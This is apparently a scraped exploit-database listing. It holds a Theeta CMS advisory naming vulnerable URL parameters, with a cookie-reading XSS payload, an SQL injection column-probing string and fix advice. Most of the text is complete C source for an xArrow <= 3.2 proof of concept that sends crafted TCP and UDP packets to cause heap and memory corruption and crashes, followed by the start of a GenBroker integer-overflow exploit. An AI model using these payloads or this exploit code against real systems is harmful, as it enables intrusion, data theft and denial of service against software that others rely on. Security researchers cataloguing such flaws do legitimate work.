Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities
2009-12-03T00:00:00
ID 1337DAY-ID-10066 Type zdt Reporter c0dy Modified 2009-12-03T00:00:00
Description
Exploit for unknown platform in category web applications
========================================================================
Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities
========================================================================
##################################################################
#
# [1]-Cross Site Scripting
#
# Vulnerability Description:
# Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web
# applications which allows code injection by malicious web users into the web pages viewed by other users.
#
# Affected items:
# http://server/community/thread.php?start=[XSS]
# http://server/community/thread.php?forum=[XSS]
# http://server/community/thread.php?cat=[XSS]
# http://server/community/forum.php?start=[XSS]
# http://server/community/forum.php?cat=[XSS]
# http://server/blog/index.php?start=[XSS]
#
#
# Example: <script>alert(document.cookie)</script>
#
# The Risk:
# By exploiting this vulnerability, an attacker can inject malicious script into the pages served by the application and steal users' cookies.
#
# Fix the vulnerability:
# * Encode output derived from input parameters for the context in which it is rendered (HTML body, attribute, JavaScript).
# * Filter input parameters for special characters, and validate them against the expected type where a numeric value is expected.
# * Filter output derived from input parameters for special characters.
#
#################################################################
#
# [2]-SQL injection
#
# Vulnerability Description:
# SQL injection is a code injection technique that exploits a security vulnerability occurring in the
# database layer of an application. The vulnerability is present when user input is either incorrectly filtered for
# string literal escape characters embedded in SQL statements or user input is not strongly typed and is thereby
# unexpectedly executed.
#
# Affected items:
# http://server/community/forum.php?start=[SQL Injection]
# http://server/community/thread.php?start=[SQL Injection]
# http://server/blog/index.php?start=[SQL Injection]
#
# Example: -1+ORDER+BY+1-- [The number of columns can be found by incrementing the number until an
# error is returned.]
#
# The Risk:
# By exploiting this vulnerability, an attacker can inject malicious SQL into the query and gain access to the
# database.
#
# Fix the vulnerability:
# To protect against SQL injection, user input must not be embedded directly in SQL statements. Instead,
# parameterized statements must be used (preferred), or user input must be carefully escaped or filtered.
# The affected `start` parameter appears to be a numeric paging offset; validating it as an integer before use also closes this vector.
#
#################################################################
#################################################################
# 0day.today [2018-03-06] #
{"id": "1337DAY-ID-10066", "bulletinFamily": "exploit", "title": "Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities", "description": "Exploit for unknown platform in category web applications", "published": "2009-12-03T00:00:00", "modified": "2009-12-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/10066", "reporter": "c0dy", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-03-06T21:09:25", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T00:06:34", "value": 6.8}}, "hash": "a6d5c868b304c146b803b3bf8314c987310c64f6eb2a8b0a8f59f2aa669a8919", "hashmap": [{"hash": "b7332ca0a4daabff482fed993517061d", "key": "published"}, {"hash": "ffda1ed9028fd45412f719bf4da278dd", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "8d9111cdccf9db245fc9a73cf127ad2c", "key": "title"}, {"hash": "663e28783fb793d51d039a60f489874d", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b7332ca0a4daabff482fed993517061d", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5619c5d430a99106d96a7042b106f3bf", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bd44126fe9659befbca888d3d5b87fcb", "key": "sourceData"}], "history": [], "href": "http://0day.today/exploit/description/10066", "id": "1337DAY-ID-10066", "lastseen": "2016-04-20T00:06:34", "modified": "2009-12-03T00:00:00", "objectVersion": "1.0", "published": "2009-12-03T00:00:00", "references": [], "reporter": "c0dy", "sourceData": 
"========================================================================\r\nTheeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities\r\n========================================================================\r\n\r\n##################################################################\r\n#\r\n# [1]-Cross Site Scripting\r\n#\r\n# Vulnerability Description:\r\n# Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web\r\napplications which allow code #injection by malicious web users into the web pages viewed by other users.\r\n#\r\n# Affected items:\r\n# http://server/community/thread.php?start=[XSS]\r\n# http://server/community/thread.php?forum=[XSS]\r\n# http://server/community/thread.php?cat=[XSS]\r\n# http://server/community/forum.php?start=[XSS]\r\n# http://server/community/forum.php?cat=[XSS]\r\n# http://server/blog/index.php?start=[XSS]\r\n#\r\n#\r\n# Exemple: <script>alert(document.cookie)</script> \r\n#\r\n# The Risk:\r\n# By exploiting this vulnerability, an attacker can inject malicious code in the script and can stole cookies.\r\n#\r\n# Fix the vulnerability:\r\n# * Encode output based on input parameters.\r\n# * Filter input parameters for special characters.\r\n# * Filter output based on input parameters for special characters...\r\n#\r\n#################################################################\r\n#\r\n# [2]-SQL injection\r\n#\r\n# Vulnerability Description:\r\n# SQL injection is a code injection technique that exploits a security vulnerability occurring in the\r\ndatabase layer of an #application. 
The vulnerability is present when user input is either incorrectly filtered for\r\nstring literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby\r\nunexpectedly executed.\r\n#\r\n# Affected items:\r\n# http://server/community/forum.php?start=[SQL Injection]\r\n# http://server/community/thread.php?start=[SQL Injection]\r\n# http://server/blog/index.php?start=[SQL Injection]\r\n#\r\n# Exemple: -1+ORDER+BY+1-- [You can find the number of colums (Well just incrementing the number until we get an\r\nerror.)]\r\n#\r\n# The Risk:\r\n# By exploiting this vulnerability, an attacker can inject malicious code in the script and can have acces to the\r\ndatabase.\r\n#\r\n# Fix the vulnerability:\r\n# To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead,\r\nparameterized statements must be used #(preferred), or user input must be carefully escaped or filtered.\r\n#\r\n#################################################################\r\n#################################################################\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "sourceHref": "http://0day.today/exploit/10066", "title": "Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities", "type": "zdt", "viewCount": 1}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:06:34"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "00157601768b634735774d15ccd18f9e"}, {"key": "href", "hash": "0976f07cee4625a54be92612ee4578a6"}, {"key": "modified", "hash": "b7332ca0a4daabff482fed993517061d"}, {"key": "published", "hash": "b7332ca0a4daabff482fed993517061d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": 
"ffda1ed9028fd45412f719bf4da278dd"}, {"key": "sourceData", "hash": "5e45460fa3762126310cacff96cee319"}, {"key": "sourceHref", "hash": "833068cf4f1363755f867be9a2c0f98f"}, {"key": "title", "hash": "8d9111cdccf9db245fc9a73cf127ad2c"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "62c9c00a5508c4f1c95771d74ab25bd181dd0670915571d6c4e1295b04897c4d", "viewCount": 1, "enchantments": {"vulnersScore": 8.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/10066", "sourceData": "========================================================================\r\nTheeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities\r\n========================================================================\r\n\r\n##################################################################\r\n#\r\n# [1]-Cross Site Scripting\r\n#\r\n# Vulnerability Description:\r\n# Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web\r\napplications which allow code #injection by malicious web users into the web pages viewed by other users.\r\n#\r\n# Affected items:\r\n# http://server/community/thread.php?start=[XSS]\r\n# http://server/community/thread.php?forum=[XSS]\r\n# http://server/community/thread.php?cat=[XSS]\r\n# http://server/community/forum.php?start=[XSS]\r\n# http://server/community/forum.php?cat=[XSS]\r\n# http://server/blog/index.php?start=[XSS]\r\n#\r\n#\r\n# Exemple: <script>alert(document.cookie)</script> \r\n#\r\n# The Risk:\r\n# By exploiting this vulnerability, an attacker can inject malicious code in the script and can stole cookies.\r\n#\r\n# Fix the vulnerability:\r\n# * Encode output based on input parameters.\r\n# * Filter input parameters for special characters.\r\n# * Filter output based on input parameters for special characters...\r\n#\r\n#################################################################\r\n#\r\n# [2]-SQL injection\r\n#\r\n# Vulnerability Description:\r\n# SQL injection is a code 
injection technique that exploits a security vulnerability occurring in the\r\ndatabase layer of an #application. The vulnerability is present when user input is either incorrectly filtered for\r\nstring literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby\r\nunexpectedly executed.\r\n#\r\n# Affected items:\r\n# http://server/community/forum.php?start=[SQL Injection]\r\n# http://server/community/thread.php?start=[SQL Injection]\r\n# http://server/blog/index.php?start=[SQL Injection]\r\n#\r\n# Exemple: -1+ORDER+BY+1-- [You can find the number of colums (Well just incrementing the number until we get an\r\nerror.)]\r\n#\r\n# The Risk:\r\n# By exploiting this vulnerability, an attacker can inject malicious code in the script and can have acces to the\r\ndatabase.\r\n#\r\n# Fix the vulnerability:\r\n# To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead,\r\nparameterized statements must be used #(preferred), or user input must be carefully escaped or filtered.\r\n#\r\n#################################################################\r\n#################################################################\r\n\r\n\r\n\n# 0day.today [2018-03-06] #"}
{"result": {"zdt": [{"lastseen": "2018-01-04T17:10:36", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "xArrow <= 3.2 multiple vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-04T17:10:36", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "value": 5.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18884", "href": "https://0day.today/exploit/description/18884", "sourceData": "-------------\r\n winerr.h\r\n-------------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not 
supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid 
name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n-------------\r\n xarrow_1.c\r\n-------------\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n#include <zlib.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 8192 // max for recvfrom\r\n#define MAXZIPLEN(n)((n)+(((n)/1000)+1)+12)\r\n\r\n\r\n\r\nint create_socket(int type, struct sockaddr_in *peer);\r\nint xarrow_send_header(int sd, u32 zsize, u32 size);\r\nint xarrow_send(int sd, u8 *buff, u32 size);\r\nint xarrow_recv(int sd, u8 *buff, u32 buffsz);\r\nint tcp_recv(int sd, u8 *buff, int len);\r\nint putmm(u8 *data, u8 *mem, int len);\r\nint putcc(u8 *data, int chr, int len);\r\nint getxx(u8 *data, u32 *ret, int bits);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n len;\r\n u16 port = 1975;\r\n u8 *buff,\r\n *host,\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"xArrow <= 3.2 multiple vulnerabilities \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) 
{\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \"1 = decompression NULL pointer\\n\"\r\n \"2 = heap corruption\\n\"\r\n \"3 = invalid read access (udp port %d)\\n\"\r\n \"4 = memory corruption (udp port %d)\\n\"\r\n \"\\n\", argv[0], port,\r\n port - 1,\r\n port - 1);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n if(bug == 1) {\r\n sd = create_socket(IPPROTO_TCP, &peer);\r\n\r\n if(xarrow_send_header(sd, -1, 100) < 0) goto quit;\r\n\r\n p = buff;\r\n p += putcc(p, 'a', 100);\r\n if(send(sd, buff, p - buff, 0) < 0) goto quit;\r\n\r\n } else if(bug == 2) {\r\n sd = create_socket(IPPROTO_TCP, &peer);\r\n\r\n for(i = 0; i < 200; i++) {\r\n if(xarrow_send(sd, NULL, 0) < 0) goto quit;\r\n }\r\n\r\n } else if(bug == 3) {\r\n peer.sin_port = htons(ntohs(peer.sin_port) - 1);\r\n sd = create_socket(IPPROTO_UDP, &peer);\r\n\r\n p = buff;\r\n p += putxx(p, 0xffffffff, 32);\r\n p += putcc(p, 0, 6);\r\n p += putxx(p, !0, 32);\r\n p += putxx(p, 4, 16);\r\n p += putxx(p, 1, 16);\r\n p += putcc(p, 0, 20);\r\n p += putxx(p, 0x7f000001, 32); // 127.0.0.1, needed!\r\n p += putcc(p, 0, 10);\r\n p += putxx(p, 0xfffd, 16); // ((num << 4) + 0x20) & 0xffff\r\n p += putcc(p, 0, 64);\r\n\r\n printf(\"- send %d bytes\\n\", p - buff);\r\n for(i = 0; i < 3; i++) {\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n }\r\n goto quit;\r\n\r\n } else if(bug == 4) {\r\n peer.sin_port = htons(ntohs(peer.sin_port) - 1);\r\n sd = create_socket(IPPROTO_UDP, &peer);\r\n\r\n // all fields set to zero because they are not necessary\r\n p = buff;\r\n p += putxx(p, 0, 32);\r\n 
p += putcc(p, 0, 6);\r\n p += putxx(p, !0, 32);\r\n p += putxx(p, 4, 16);\r\n p += putxx(p, 1, 16);\r\n p += putcc(p, 0, 20);\r\n p += putxx(p, 0x7f000001, 32); // 127.0.0.1, needed!\r\n p += putcc(p, 0, 10);\r\n p += putxx(p, 0, 16);\r\n p += putcc(p, 0, BUFFSZ - (p - buff));\r\n putxx(buff, (p - buff) - 0x16, 32); // correct size\r\n\r\n printf(\"- send %d bytes\\n\", p - buff);\r\n for(i = 0; i < 3; i++) {\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n }\r\n goto quit;\r\n\r\n } else {\r\n printf(\"\\nError: invalid bug number (%d)\\n\", bug);\r\n exit(1);\r\n }\r\n\r\n for(;;) {\r\n len = xarrow_recv(sd, buff, BUFFSZ);\r\n if(len < 0) goto quit;\r\n }\r\n\r\nquit:\r\n printf(\"- done\\n\");\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint create_socket(int type, struct sockaddr_in *peer) {\r\n static struct linger ling = {1,1};\r\n static int on = 1;\r\n int sd;\r\n\r\n if(type == IPPROTO_TCP) {\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))\r\n < 0) std_err();\r\n printf(\"- connected\\n\");\r\n } else {\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n }\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));\r\n setsockopt(sd, IPPROTO_TCP, TCP_NODELAY, (char *)&on, sizeof(on));\r\n return(sd);\r\n}\r\n\r\n\r\n\r\nint xarrow_send_header(int sd, u32 zsize, u32 size) {\r\n int i;\r\n u8 header[6 + 12],\r\n *p;\r\n\r\n p = header;\r\n for(i = 0; i < 3; i++) {\r\n *p++ = 0xeb;\r\n *p++ = 0x90;\r\n }\r\n p += putxx(p, zsize, 32);\r\n p += putxx(p, size, 32);\r\n p += putxx(p, 0xeb90d709, 32);\r\n for(i = 6; i < sizeof(header); i++) {\r\n header[i] ^= 0x50 ^ 0x65 ^ 0x69; // yeah 0x5c\r\n }\r\n if(send(sd, header, sizeof(header), 0) != sizeof(header)) return(-1);\r\n 
return(0);\r\n}\r\n\r\n\r\n\r\nint xarrow_send(int sd, u8 *buff, u32 size) {\r\n static u8 *zbuff = NULL;\r\n uLongf zsize;\r\n\r\n zsize = MAXZIPLEN(size);\r\n zbuff = realloc(zbuff, zsize);\r\n if(!zbuff) std_err();\r\n //if(!buff || !size) // compress it anyway!\r\n if(compress2(zbuff, &zsize, buff, size, 9) != Z_OK) return(-1);\r\n if(xarrow_send_header(sd, zsize, size) < 0) return(-1);\r\n if(send(sd, zbuff, zsize, 0) != zsize) return(-1);\r\n printf(\"- %u -> %u bytes sent\\n\", size, (u32)zsize);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint xarrow_recv(int sd, u8 *buff, u32 buffsz) {\r\n static u8 *zbuff = NULL;\r\n uLongf tmp;\r\n u32 zsize,\r\n size,\r\n type;\r\n int i;\r\n u8 header[6 + 12],\r\n *p;\r\n\r\n if(tcp_recv(sd, header, sizeof(header)) < 0) return(-1);\r\n p = header;\r\n for(i = 0; i < 3; i++) {\r\n if(*p != 0xeb) return(-2); p++;\r\n if(*p != 0x90) return(-3); p++;\r\n }\r\n for(i = 6; i < sizeof(header); i++) {\r\n header[i] ^= 0x5c;\r\n }\r\n p += getxx(p, &zsize, 32);\r\n p += getxx(p, &size, 32);\r\n p += getxx(p, &type, 32);\r\n if(type == 0xeb90d709) {\r\n if(zsize > buffsz) return(-4);\r\n zbuff = realloc(zbuff, zsize);\r\n if(!zbuff) std_err();\r\n if(tcp_recv(sd, zbuff, zsize) < 0) return(-5);\r\n tmp = size;\r\n if(uncompress(buff, &tmp, zbuff, zsize) != Z_OK) return(-6);\r\n } else { // in reality here it gets just rejected\r\n if(size > buffsz) return(-4);\r\n if(tcp_recv(sd, buff, size) < 0) return(-5);\r\n }\r\n printf(\"- %u -> %u bytes received\\n\", zsize, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint tcp_recv(int sd, u8 *buff, int len) {\r\n int t;\r\n u8 *p;\r\n\r\n for(p = buff; len; p += t, len -= t) {\r\n if(timeout(sd, 5) < 0) return(-1);\r\n t = recv(sd, p, len, 0);\r\n if(t <= 0) return(-1);\r\n }\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *mem, int len) {\r\n if(len < 0) len = strlen(mem) + 1;\r\n memcpy(data, mem, len);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int len) {\r\n 
memset(data, chr, len);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint getxx(u8 *data, u32 *ret, int bits) {\r\n u32 num;\r\n int i,\r\n bytes;\r\n\r\n if(bits <= 4) bytes = bits;\r\n else bytes = bits >> 3;\r\n for(num = i = 0; i < bytes; i++) {\r\n num |= (data[i] << (i << 3));\r\n }\r\n *ret = num;\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n if(bits <= 4) bytes = bits;\r\n else bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n }\r\n host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18884"}, {"lastseen": "2018-01-05T03:05:45", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 2, "reporter": "Luigi Auriemma", "published": "2012-07-01T00:00:00", "title": "GenBroker <= 9.21.201.01 multiple integer overflows", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-05T03:05:45", "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/", "value": 3.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-07-01T00:00:00", "id": "1337DAY-ID-18889", "href": 
"https://0day.today/exploit/description/18889", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 
10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n-------------\r\ngenesis_iof.c\r\n-------------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n 
